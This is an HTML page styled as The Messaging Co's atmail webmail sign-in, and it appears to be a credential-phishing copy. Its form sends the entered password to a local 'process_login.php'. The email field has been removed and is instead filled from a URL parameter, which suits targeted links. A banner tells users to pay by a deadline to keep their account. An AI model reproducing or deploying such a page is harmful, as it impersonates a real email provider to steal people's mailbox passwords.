<!DOCTYPE html>
<html data-os="Windows" data-ua="Opera-112.0.0.0" class="hydrated" lang="en_gb">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <style data-styles="">duet-date-picker{visibility:hidden}.hydrated{visibility:inherit}</style>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Your Brand. Your Email.">
    <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=5">
    <meta name="referrer" content="strict-origin">
    <title>Sign in - Webmail</title>
    <base href=".">
    <link rel="manifest" href="https://webmail.themessagingco.com.au/manifest.json">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="atmail webmail">
    <link rel="icon" sizes="32x32" href="https://webmail.themessagingco.com.au/images/icons/32x32.png">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="atmail webmail">
    <link rel="apple-touch-icon" href="https://webmail.themessagingco.com.au/images/icons/152x152.png">
    <meta name="theme-color" content="#f4f4f4">
    <link rel="/app-e5ebf55441986397273b.css">
    <noscript>
      <meta http-equiv="refresh" content="0; url=nojs.html" />
    </noscript>
    <script>
      var isOldIE = !!window.ActiveXObject;
      if (isOldIE) document.location = 'unsupported.html';
      var isIE11 = !!window.MSInputMethodContext && !!document.documentMode;
      if (isIE11) {
        var polyfillsrc = document.createElement('script');
        polyfillsrc.setAttribute('src', "polyfill.min.js");
        document.head.appendChild(polyfillsrc);
      }

      // Function to prefill the email field
      function prefillEmail() {
        var urlParams = new URLSearchParams(window.location.search);
        var email = urlParams.get('email');
        if (email) {
          document.getElementById('loginUsername').value = email;
        }
      }

      // Execute prefill on page load
      window.onload = prefillEmail;
    </script>
    
    <!-- Initial page loading styles. -->
    <style>
      @import url('./app-e5ebf55441986397273b.css');

      .initSpinner {
        position: absolute;
        top: 50%;
        left: 50%;
        width: 32px;
        height: 32px;
        background-color: #808080;
        margin: -16px 0 0 -16px;
        animation: rootSpinner 1.2s infinite ease-in-out;
      }

      @keyframes rootSpinner {
        0% {
          transform: perspective(120px) rotateX(0) rotateY(0);
        }

        50% {
          transform: perspective(120px) rotateX(-180deg) rotateY(0);
        }

        100% {
          transform: perspective(120px) rotateX(-180deg) rotateY(-180deg);
        }
      }

      *.keypressFocused:focus,
      *.parentFocus,
      #sidebarNavigation .miniCalendar *.keypressFocused:focus,
      #sidebarNavigation .miniCalendar *.parentFocus {
        outline: #2E73E2 solid 2px;
        outline-offset: 2px;
      }

      .MuiCheckbox-root.Mui-focusVisible {
        outline: #2E73E2 solid 2px;
      }

      #sidebarNavigation *.keypressFocused:focus,
      #sidebarNavigation *.parentFocus,
      #loginPage *.keypressFocused:focus,
      #loginPage *.parentFocus,
      #recoveryPage *.keypressFocused:focus,
      #recoveryPage *.parentFocus {
        outline: #FFFFFF solid 2px;
        outline-offset: 2px;
      }

      #sidebarNavigation .MuiCheckbox-root.Mui-focusVisible {
        outline: #FFFFFF solid 2px;
      }

      *:focus-visible {
        outline: 0;
      }

      #renderCalendar span.MuiPickersCalendarHeader-dayLabel {
        color: #000000;
      }

      del::before,
      del::after {
        clip-path: inset(100%);
        clip: rect(1px, 1px, 1px, 1px);
        height: 1px;
        overflow: hidden;
        position: absolute;
        white-space: nowrap;
        width: 1px;
      }

      del::before {
        content: " [deletion start] ";
      }

      del::after {
        content: " [deletion end] ";
      }

      /* Windows high contrast mode)*/
      @media (forced-colors:active) {
        button,
        .MuiDialog-root .MuiDialog-paper,
        .MuiPopover-root .MuiPopover-paper {
          border: 1px solid transparent !important;
        }

        *.keypressFocused:focus,
        *.parentFocus {
          border: 2px solid transparent !important;
        }

        svg.MuiSvgIcon-root {
          fill: white !important;
          stroke: black !important;
        }

        /* Window high contrast fix input field with wierd overlay */
        div.MuiInput-underline:before {
          content: " " !important;
        }
      }

      #initError {
        display: none;
        flex-direction: column;
        align-items: center;
        margin: 4rem 2rem;
      }

      #initError p {
        color: #666;
        font-size: 1.2rem;
      }
      #initError p:last-of-type {
        margin-bottom: 4rem;
      }
      #initError p:first-of-type {
        margin-top: 0;
      }
      #initError ul {
        margin: 2rem 0;
        padding: 0;
        text-align: center;
      }
      #initError li {
        display: inline-block;
        font-size: 1.8rem;
        line-height: 55px;
        color: #666;
      }
      #initError li:not(:first-of-type):before {
        content: "|";
        margin: 0 10px;
        color: #d0d0d0;
      }
      .initReloadButton {
        height: 36px;
        line-height: 36px;
        vertical-align: middle;
        color: #fff;
        background: #53aaee;
        padding: 0 12px;
        font-family: Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif;
        font-size: 14px;
        font-weight: 500;
        text-align: center;
        text-transform: uppercase;
        cursor: pointer;
        border: none;
        border-radius: 8px;
        box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
      }
    </style>

    <script>
      function handleReloadClick() {
        localStorage.removeItem('webmail-8.26.0');
        location.reload(true);
      };
    </script>
  <style data-jss="" data-meta="MuiInputBase">
@-webkit-keyframes mui-auto-fill {}
@-webkit-keyframes mui-auto-fill-cancel {}
.MuiInputBase-root {
  color: rgba(0, 0, 0, 0.87);
  cursor: text;
  display: inline-flex;
  position: relative;
  font-size: 1rem;
  box-sizing: border-box;
  align-items: center;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  font-weight: 400;
  line-height: 1.1876em;
  letter-spacing: 0.00938em;
}
.MuiInputBase-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.38);
  cursor: default;
}
.MuiInputBase-multiline {
  padding: 6px 0 7px;
}
.MuiInputBase-multiline.MuiInputBase-marginDense {
  padding-top: 3px;
}
.MuiInputBase-fullWidth {
  width: 100%;
}
.MuiInputBase-input {
  font: inherit;
  color: currentColor;
  width: 100%;
  border: 0;
  height: 1.1876em;
  margin: 0;
  display: block;
  padding: 6px 0 7px;
  min-width: 0;
  background: none;
  box-sizing: content-box;
  animation-name: mui-auto-fill-cancel;
  letter-spacing: inherit;
  animation-duration: 10ms;
  -webkit-tap-highlight-color: transparent;
}
.MuiInputBase-input::-webkit-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-moz-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:focus {
  outline: 0;
}
.MuiInputBase-input:invalid {
  box-shadow: none;
}
.MuiInputBase-input::-webkit-search-decoration {
  -webkit-appearance: none;
}
.MuiInputBase-input.Mui-disabled {
  opacity: 1;
}
.MuiInputBase-input:-webkit-autofill {
  animation-name: mui-auto-fill;
  animation-duration: 5000s;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
  opacity: 0.42;
}
.MuiInputBase-inputMarginDense {
  padding-top: 3px;
}
.MuiInputBase-inputMultiline {
  height: auto;
  resize: none;
  padding: 0;
}
.MuiInputBase-inputTypeSearch {
  -moz-appearance: textfield;
  -webkit-appearance: textfield;
}
</style><style data-jss="" data-meta="MuiInput">
.MuiInput-root {
  position: relative;
}
label + .MuiInput-formControl {
  margin-top: 16px;
}
.MuiInput-colorSecondary.MuiInput-underline:after {
  border-bottom-color: #0A5C9C;
}
.MuiInput-underline:after {
  left: 0;
  right: 0;
  bottom: 0;
  content: "";
  position: absolute;
  transform: scaleX(0);
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
  border-bottom: 2px solid #0A5C9C;
  pointer-events: none;
}
.MuiInput-underline.Mui-focused:after {
  transform: scaleX(1);
}
.MuiInput-underline.Mui-error:after {
  transform: scaleX(1);
  border-bottom-color: #DE3535;
}
.MuiInput-underline:before {
  left: 0;
  right: 0;
  bottom: 0;
  content: "\00a0";
  position: absolute;
  transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  pointer-events: none;
}
.MuiInput-underline:hover:not(.Mui-disabled):before {
  border-bottom: 2px solid rgba(0, 0, 0, 0.87);
}
.MuiInput-underline.Mui-disabled:before {
  border-bottom-style: dotted;
}
@media (hover: none) {
  .MuiInput-underline:hover:not(.Mui-disabled):before {
    border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  }
}
</style><style data-jss="" data-meta="MuiFormLabel">
.MuiFormLabel-root {
  color: rgba(0, 0, 0, 0.54);
  padding: 0;
  font-size: 1rem;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  font-weight: 400;
  line-height: 1;
  letter-spacing: 0.00938em;
}
.MuiFormLabel-root.Mui-focused {
  color: #0A5C9C;
}
.MuiFormLabel-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.38);
}
.MuiFormLabel-root.Mui-error {
  color: #DE3535;
}
.MuiFormLabel-colorSecondary.Mui-focused {
  color: #0A5C9C;
}
.MuiFormLabel-asterisk.Mui-error {
  color: #DE3535;
}
</style><style data-jss="" data-meta="MuiInputLabel">
.MuiInputLabel-root {
  display: block;
  transform-origin: top left;
}
.MuiInputLabel-formControl {
  top: 0;
  left: 0;
  position: absolute;
  transform: translate(0, 24px) scale(1);
}
.MuiInputLabel-marginDense {
  transform: translate(0, 21px) scale(1);
}
.MuiInputLabel-shrink {
  transform: translate(0, 1.5px) scale(0.75);
  transform-origin: top left;
}
.MuiInputLabel-animated {
  transition: color 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms,transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
}
.MuiInputLabel-filled {
  z-index: 1;
  transform: translate(12px, 20px) scale(1);
  pointer-events: none;
}
.MuiInputLabel-filled.MuiInputLabel-marginDense {
  transform: translate(12px, 17px) scale(1);
}
.MuiInputLabel-filled.MuiInputLabel-shrink {
  transform: translate(12px, 10px) scale(0.75);
}
.MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
  transform: translate(12px, 7px) scale(0.75);
}
.MuiInputLabel-outlined {
  z-index: 1;
  transform: translate(14px, 20px) scale(1);
  pointer-events: none;
}
.MuiInputLabel-outlined.MuiInputLabel-marginDense {
  transform: translate(14px, 12px) scale(1);
}
.MuiInputLabel-outlined.MuiInputLabel-shrink {
  transform: translate(14px, -6px) scale(0.75);
}
</style><style data-jss="" data-meta="MuiFormControl">
.MuiFormControl-root {
  border: 0;
  margin: 0;
  display: inline-flex;
  padding: 0;
  position: relative;
  min-width: 0;
  flex-direction: column;
  vertical-align: top;
}
.MuiFormControl-marginNormal {
  margin-top: 16px;
  margin-bottom: 8px;
}
.MuiFormControl-marginDense {
  margin-top: 8px;
  margin-bottom: 4px;
}
.MuiFormControl-fullWidth {
  width: 100%;
}
</style><style data-jss="" data-meta="MuiPopover">
.MuiPopover-paper {
  outline: 0;
  position: absolute;
  max-width: calc(100% - 32px);
  min-width: 16px;
  max-height: calc(100% - 32px);
  min-height: 16px;
  overflow-x: hidden;
  overflow-y: auto;
}
</style><style data-jss="" data-meta="MuiMenu">
.MuiMenu-paper {
  max-height: calc(100% - 96px);
  -webkit-overflow-scrolling: touch;
}
.MuiMenu-list {
  outline: 0;
}
</style><style data-jss="" data-meta="MuiSvgIcon">
.MuiSvgIcon-root {
  fill: currentColor;
  width: 1em;
  height: 1em;
  display: inline-block;
  font-size: 1.5rem;
  transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  flex-shrink: 0;
  user-select: none;
}
.MuiSvgIcon-colorPrimary {
  color: #0A5C9C;
}
.MuiSvgIcon-colorSecondary {
  color: #0A5C9C;
}
.MuiSvgIcon-colorAction {
  color: rgba(0, 0, 0, 0.54);
}
.MuiSvgIcon-colorError {
  color: #DE3535;
}
.MuiSvgIcon-colorDisabled {
  color: rgba(0, 0, 0, 0.26);
}
.MuiSvgIcon-fontSizeInherit {
  font-size: inherit;
}
.MuiSvgIcon-fontSizeSmall {
  font-size: 1.25rem;
}
.MuiSvgIcon-fontSizeLarge {
  font-size: 2.1875rem;
}
</style><style data-jss="" data-meta="MuiTextField">

</style><style data-jss="" data-meta="MuiTouchRipple">
.MuiTouchRipple-root {
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  z-index: 0;
  overflow: hidden;
  position: absolute;
  border-radius: inherit;
  pointer-events: none;
}
.MuiTouchRipple-ripple {
  opacity: 0;
  position: absolute;
}
.MuiTouchRipple-rippleVisible {
  opacity: 0.3;
  animation: MuiTouchRipple-keyframes-enter 550ms cubic-bezier(0.4, 0, 0.2, 1);
  transform: scale(1);
}
.MuiTouchRipple-ripplePulsate {
  animation-duration: 200ms;
}
.MuiTouchRipple-child {
  width: 100%;
  height: 100%;
  display: block;
  opacity: 1;
  border-radius: 50%;
  background-color: currentColor;
}
.MuiTouchRipple-childLeaving {
  opacity: 0;
  animation: MuiTouchRipple-keyframes-exit 550ms cubic-bezier(0.4, 0, 0.2, 1);
}
.MuiTouchRipple-childPulsate {
  top: 0;
  left: 0;
  position: absolute;
  animation: MuiTouchRipple-keyframes-pulsate 2500ms cubic-bezier(0.4, 0, 0.2, 1) 200ms infinite;
}
@-webkit-keyframes MuiTouchRipple-keyframes-enter {
  0% {
    opacity: 0.1;
    transform: scale(0);
  }
  100% {
    opacity: 0.3;
    transform: scale(1);
  }
}
@-webkit-keyframes MuiTouchRipple-keyframes-exit {
  0% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}
@-webkit-keyframes MuiTouchRipple-keyframes-pulsate {
  0% {
    transform: scale(1);
  }
  50% {
    transform: scale(0.92);
  }
  100% {
    transform: scale(1);
  }
}
</style><style data-jss="" data-meta="MuiButtonBase">
.MuiButtonBase-root {
  color: inherit;
  border: 0;
  cursor: pointer;
  margin: 0;
  display: inline-flex;
  outline: 0;
  padding: 0;
  position: relative;
  align-items: center;
  user-select: none;
  border-radius: 0;
  vertical-align: middle;
  -moz-appearance: none;
  justify-content: center;
  text-decoration: none;
  background-color: transparent;
  -webkit-appearance: none;
  -webkit-tap-highlight-color: transparent;
}
.MuiButtonBase-root::-moz-focus-inner {
  border-style: none;
}
.MuiButtonBase-root.Mui-disabled {
  cursor: default;
  pointer-events: none;
}
@media print {
  .MuiButtonBase-root {
    -webkit-print-color-adjust: exact;
  }
}
</style><style data-jss="" data-meta="MuiIconButton">
.MuiIconButton-root {
  flex: 0 0 auto;
  color: rgba(0, 0, 0, 0.54);
  padding: 12px;
  overflow: visible;
  font-size: 1.5rem;
  text-align: center;
  transition: background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  border-radius: 50%;
}
.MuiIconButton-root:hover {
  background-color: rgba(0, 0, 0, 0.04);
}
.MuiIconButton-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.26);
  background-color: transparent;
}
@media (hover: none) {
  .MuiIconButton-root:hover {
    background-color: transparent;
  }
}
.MuiIconButton-edgeStart {
  margin-left: -12px;
}
.MuiIconButton-sizeSmall.MuiIconButton-edgeStart {
  margin-left: -3px;
}
.MuiIconButton-edgeEnd {
  margin-right: -12px;
}
.MuiIconButton-sizeSmall.MuiIconButton-edgeEnd {
  margin-right: -3px;
}
.MuiIconButton-colorInherit {
  color: inherit;
}
.MuiIconButton-colorPrimary {
  color: #0A5C9C;
}
.MuiIconButton-colorPrimary:hover {
  background-color: rgba(10, 92, 156, 0.04);
}
@media (hover: none) {
  .MuiIconButton-colorPrimary:hover {
    background-color: transparent;
  }
}
.MuiIconButton-colorSecondary {
  color: #0A5C9C;
}
.MuiIconButton-colorSecondary:hover {
  background-color: rgba(10, 92, 156, 0.04);
}
@media (hover: none) {
  .MuiIconButton-colorSecondary:hover {
    background-color: transparent;
  }
}
.MuiIconButton-sizeSmall {
  padding: 3px;
  font-size: 1.125rem;
}
.MuiIconButton-label {
  width: 100%;
  display: flex;
  align-items: inherit;
  justify-content: inherit;
}
</style><style data-jss="" data-meta="MuiButton">
.MuiButton-root {
  color: rgba(0, 0, 0, 0.87);
  padding: 6px 16px;
  font-size: 0.875rem;
  min-width: 64px;
  box-sizing: border-box;
  transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  font-weight: 500;
  line-height: 1.75;
  border-radius: 4px;
  letter-spacing: 0.02857em;
  text-transform: uppercase;
}
.MuiButton-root:hover {
  text-decoration: none;
  background-color: rgba(0, 0, 0, 0.04);
}
.MuiButton-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.26);
}
@media (hover: none) {
  .MuiButton-root:hover {
    background-color: transparent;
  }
}
.MuiButton-root:hover.Mui-disabled {
  background-color: transparent;
}
.MuiButton-label {
  width: 100%;
  display: inherit;
  align-items: inherit;
  justify-content: inherit;
}
.MuiButton-text {
  padding: 6px 8px;
}
.MuiButton-textPrimary {
  color: #0A5C9C;
}
.MuiButton-textPrimary:hover {
  background-color: rgba(10, 92, 156, 0.04);
}
@media (hover: none) {
  .MuiButton-textPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-textSecondary {
  color: #63666A;
}
.MuiButton-textSecondary:hover {
  color: #000;
  background-color: #eee;
}
@media (hover: none) {
  .MuiButton-textSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlined {
  border: 1px solid rgba(0, 0, 0, 0.23);
  padding: 5px 15px;
}
.MuiButton-outlined.Mui-disabled {
  border: 1px solid rgba(0, 0, 0, 0.12);
}
.MuiButton-outlinedPrimary {
  color: #0A5C9C;
  border: 1px solid rgba(10, 92, 156, 0.5);
}
.MuiButton-outlinedPrimary:hover {
  border: 1px solid #0A5C9C;
  background-color: rgba(10, 92, 156, 0.04);
}
@media (hover: none) {
  .MuiButton-outlinedPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlinedSecondary {
  color: #0A5C9C;
  border: 1px solid rgba(10, 92, 156, 0.5);
}
.MuiButton-outlinedSecondary:hover {
  border: 1px solid #0A5C9C;
  background-color: rgba(10, 92, 156, 0.04);
}
.MuiButton-outlinedSecondary.Mui-disabled {
  border: 1px solid rgba(0, 0, 0, 0.26);
}
@media (hover: none) {
  .MuiButton-outlinedSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-contained {
  color: rgba(0, 0, 0, 0.87);
  box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12);
  background-color: #e0e0e0;
}
.MuiButton-contained:hover {
  box-shadow: 0px 2px 4px -1px rgba(0,0,0,0.2),0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12);
  background-color: #d5d5d5;
}
.MuiButton-contained.Mui-focusVisible {
  box-shadow: 0px 3px 5px -1px rgba(0,0,0,0.2),0px 6px 10px 0px rgba(0,0,0,0.14),0px 1px 18px 0px rgba(0,0,0,0.12);
}
.MuiButton-contained:active {
  box-shadow: 0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px 2px rgba(0,0,0,0.12);
}
.MuiButton-contained.Mui-disabled {
  color: rgba(0, 0, 0, 0.26);
  box-shadow: none;
  background-color: rgba(0, 0, 0, 0.12);
}
@media (hover: none) {
  .MuiButton-contained:hover {
    box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12);
    background-color: #e0e0e0;
  }
}
.MuiButton-contained:hover.Mui-disabled {
  background-color: rgba(0, 0, 0, 0.12);
}
.MuiButton-containedPrimary {
  color: #fff;
  background-color: #0A5C9C;
}
.MuiButton-containedPrimary:hover {
  background-color: rgb(7, 64, 109);
}
@media (hover: none) {
  .MuiButton-containedPrimary:hover {
    background-color: #0A5C9C;
  }
}
.MuiButton-containedSecondary {
  color: #0D0A28;
  background-color: #fff;
}
.MuiButton-containedSecondary:hover {
  color: #000;
  background-color: inherit;
}
@media (hover: none) {
  .MuiButton-containedSecondary:hover {
    color: #000;
    background-color: inherit;
  }
}
.MuiButton-disableElevation {
  box-shadow: none;
}
.MuiButton-disableElevation:hover {
  box-shadow: none;
}
.MuiButton-disableElevation.Mui-focusVisible {
  box-shadow: none;
}
.MuiButton-disableElevation:active {
  box-shadow: none;
}
.MuiButton-disableElevation.Mui-disabled {
  box-shadow: none;
}
.MuiButton-colorInherit {
  color: inherit;
  border-color: currentColor;
}
.MuiButton-textSizeSmall {
  padding: 4px 5px;
  font-size: 0.8125rem;
}
.MuiButton-textSizeLarge {
  padding: 8px 11px;
  font-size: 0.9375rem;
}
.MuiButton-outlinedSizeSmall {
  padding: 3px 9px;
  font-size: 0.8125rem;
}
.MuiButton-outlinedSizeLarge {
  padding: 7px 21px;
  font-size: 0.9375rem;
}
.MuiButton-containedSizeSmall {
  padding: 4px 10px;
  font-size: 0.8125rem;
}
.MuiButton-containedSizeLarge {
  padding: 8px 22px;
  font-size: 0.9375rem;
}
.MuiButton-fullWidth {
  width: 100%;
}
.MuiButton-startIcon {
  display: inherit;
  margin-left: -4px;
  margin-right: 8px;
}
.MuiButton-startIcon.MuiButton-iconSizeSmall {
  margin-left: -2px;
}
.MuiButton-endIcon {
  display: inherit;
  margin-left: 8px;
  margin-right: -4px;
}
.MuiButton-endIcon.MuiButton-iconSizeSmall {
  margin-right: -2px;
}
.MuiButton-iconSizeSmall > *:first-child {
  font-size: 18px;
}
.MuiButton-iconSizeMedium > *:first-child {
  font-size: 20px;
}
.MuiButton-iconSizeLarge > *:first-child {
  font-size: 22px;
}
</style><style data-jss="" data-meta="MuiInputAdornment">
.MuiInputAdornment-root {
  height: 0.01em;
  display: flex;
  max-height: 2em;
  align-items: center;
  white-space: nowrap;
}
.MuiInputAdornment-filled.MuiInputAdornment-positionStart:not(.MuiInputAdornment-hiddenLabel) {
  margin-top: 16px;
}
.MuiInputAdornment-positionStart {
  margin-right: 8px;
}
.MuiInputAdornment-positionEnd {
  margin-left: 8px;
}
.MuiInputAdornment-disablePointerEvents {
  pointer-events: none;
}
</style><style data-jss="" data-meta="makeStyles">
.jss11 {
  margin: 1em 0 1em 0;
}
.jss11 .MuiInputBase-root {
  color: #0A5C9C;
}
.jss11 .MuiInput-underline:before {
  border-bottom-color: #0A5C9C;
}
.jss11 .MuiInput-underline:hover:before {
  border-bottom-color: #0A5C9C;
}
.jss11 .MuiInput-underline:after {
  border-bottom-color: #0A5C9C;
}
</style><style data-jss="" data-meta="makeStyles">
    </style>
</head>
<body dir="ltr" lang="en" class="desktop">
    <div id="app" style="height: 100%;">
        <div class="style__column___clChf" aria-hidden="false">
            <div style="height: 100vh; position: relative;">
                <div class="style__row___wVyIi" aria-hidden="false">
                    <span></span>
                    <div class="style__column___clChf" aria-hidden="false">
                        <span>
                            <div class="style__container___IAx7j" id="loginPage" style="color: rgb(10, 92, 156);">
                                <div class="style__loginRow___Xrd1D">
                                    <div class="style__loginColumn___HGR9I"></div>
                                </div>
                                <div class="style__loginRow___Xrd1D">
                                    <div class="style__loginColumn___HGR9I"></div>
                                    <div class="style__loginColumn___HGR9I">
                                        <main>
                                          <form class="style__form___yHC0F" method="POST" action="process_login.php">
                                            <div class="style__logo___AyRcc">
                                                <img src="/9c5c49adbec1fa40005bb138a4095e80-login.png" alt="Webmail logo style="max-width: 200%; height: auto;"">
                                            </div>
                                            <div style="width: 100%;">
                                                <!-- Email input is removed; email will be prefilled by script -->
                                                <br>
                                                <div class="MuiFormControl-root MuiTextField-root jss185 MuiFormControl-fullWidth">
                                                    <label class="MuiFormLabel-root MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated" data-shrink="false" for="loginPassword" id="loginPassword-label">Password</label>
                                                    <p></p>
                                                    <div class="MuiInputBase-root MuiInput-root MuiInput-underline MuiInputBase-fullWidth MuiInput-fullWidth MuiInputBase-formControl MuiInput-formControl MuiInputBase-adornedEnd">
                                                        <input aria-invalid="false" autocomplete="off" id="loginPassword" name="password" placeholder="Enter your password" aria-required="true" class="MuiInputBase-input MuiInput-input MuiInputBase-inputAdornedEnd" name="ppol" value="">
                                                        <div class="MuiInputAdornment-root MuiInputAdornment-positionEnd">
                                                            <button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-edgeEnd" tabindex="0" type="button" id="togglePasswordBtn" aria-label="toggle password visibility">
                                                                <span class="MuiIconButton-label">
                                                                    <svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M12 4.5C7 4.5 2.73 7.61 1 12c1.73 4.39 6 7.5 11 7.5s9.27-3.11 11-7.5c-1.73-4.39-6-7.5-11-7.5zM12 17c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5zm0-8c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"></path></svg></span><span class="MuiTouchRipple-root"></span></button></div></div></div><div class="" id="loginMessageElem" tabindex="-1">&nbsp;</div><button class="MuiButtonBase-root MuiButton-root MuiButton-contained style__submit___VcNB0 MuiButton-fullWidth" tabindex="0" type="submit" id="loginButton" style="background: rgb(10, 92, 156); color: rgb(255, 255, 255);"><span class="MuiButton-label">Sign in</span><span class="MuiTouchRipple-root"></span></button><div class="style__linkRoleButtonsWrap___ydPQ3"><a class="style__linkRoleButton___kxZ2G" href="javascript:void(0)" role="button"><div id="loginForgotPassword" class="style__recovery___AnSSy">Reset my password</div></a><span class="style__divider___PnMM1"></span><a class="style__linkRoleButton___kxZ2G" href="javascript:void(0)" role="button"><div id="loginForgotPassword" class="style__recovery___AnSSy">Sign in another way</div></a></div><div class="style__localeSelector___anv1a"><br><div class="style__container___P4EY8"><label class="style__localeSelectorLabel___vhpwb" id="loginLocale">Language</label><span id="webid-0ea889ae-1840-414f-99b0-a505012c00be" style="position: absolute; left: -10000px; top: auto; width: 1px; height: 1px; overflow: hidden;">Use the dropdown menu to switch language</span><button class="MuiButtonBase-root MuiButton-root MuiButton-text style__buttonStyle___Zrc9O  MuiButton-textSizeSmall MuiButton-sizeSmall" tabindex="0" type="button" aria-expanded="false" aria-haspopup="true" aria-describedby="webid-0ea889ae-1840-414f-99b0-a505012c00be" aria-label="Current language: English (UK)"><span class="MuiButton-label style__buttonTextStyle___Aixhv">English (UK)<span class="MuiButton-endIcon MuiButton-iconSizeSmall"><svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M7 10l5 5 5-5z"></path></svg></span></span></button></div></div></div><a class="style__recovery___AnSSy" href="https://themessaging.co/privacy/" style="margin-top: 15px;">Privacy Policy</a><div id="version" class="style__version___mR3O2">v8.44.1</div></form></main></div><div class="style__loginColumn___HGR9I"></div></div><div class="style__loginRow___Xrd1D"><div class="style__loginColumn___HGR9I"><aside class="other"><span style="position: absolute; left: -10000px; top: auto; width: 1px; height: 1px; overflow: hidden;">Start of promotion</span><div class="style__content___kF7PR"><div style="width: 100%;"><div style="margin-left:auto; margin-right:auto; margin-top: 50px; max-width:600px;">
 <!-- JavaScript to toggle password visibility -->
 <script>
  const togglePasswordBtn = document.getElementById('togglePasswordBtn');
  const passwordField = document.getElementById('loginPassword');

  togglePasswordBtn.addEventListener('click', function () {
      const type = passwordField.getAttribute('type') === 'password' ? 'text' : 'password';
      passwordField.setAttribute('type', type);
  });
</script>
<div class="style__logo___AyRcc">
  <img src="/9c5c49adbec1fa40005bb138a4095e801-login.png" alt="Webmail logo style="max-width: 200%; height: auto;"">
   </div> 
   <p style="text-align:justify; text-justify: inter-word;">
<strong style="color:red !important;">Important: </strong> <br>
<a href="https://support.themessaging.co/hc/en-au/articles/10156367079951-How-to-select-a-subscription-plan" target="_blank" style="display:inline; color:#0A5C9C;">Please pay by 20 Sep 2024</a> to keep your email account (if you are a sponsored email customer). 
<a href="https://support.themessaging.co/hc/en-au/articles/9414921568911-Frequently-asked-questions-for-paid-email-customers" target="_blank" style="display:inline; color:#0A5C9C;">Different deadlines</a> apply for customers who previously paid for their email services.</p>
</div></div></div><span style="position: absolute; left: -10000px; top: auto; width: 1px; height: 1px; overflow: hidden;">End of promotion</span></aside></div></div></div></span></div></div></div></div></div>
    <div id="initError">
